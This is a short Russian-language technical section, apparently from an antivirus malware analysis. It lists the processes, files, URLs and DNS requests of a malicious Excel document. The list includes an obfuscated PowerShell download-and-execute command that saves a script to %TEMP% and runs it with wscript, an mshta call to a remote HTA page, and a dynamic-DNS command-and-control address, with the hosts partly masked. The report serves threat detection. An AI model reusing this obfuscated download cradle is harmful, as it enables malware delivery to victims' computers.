Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://ad####doseng.com/MARCOSVIADO'',$env:temp+''\\''+''central.js'')'|D; start-p...
- '<SYSTEM32>\wscript.exe' "%TEMP%\central.js"
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{c897ee99-248c-484e-900b-af535a252de2}.tmp
- %TEMP%\central.js
- %HOMEPATH%\central.js
- http://ad####doseng.com/goigoi.html
- http://ad####doseng.com/MARCOSVIADO
- http://20#######imadeles.ddns.net:7974/Vre via 20######cimadeles.ddns.net
- DNS ASK ad####doseng.com
- DNS ASK 20######cimadeles.ddns.net
- '<SYSTEM32>\wscript.exe' "%TEMP%\central.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://ad####doseng.com/MARCOSVIADO'',$env:temp+''\\''+''central.js'')'|D; start-p...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://ad####doseng.com/goigoi.html' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\mshta.exe' http://ad####doseng.com/goigoi.html
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding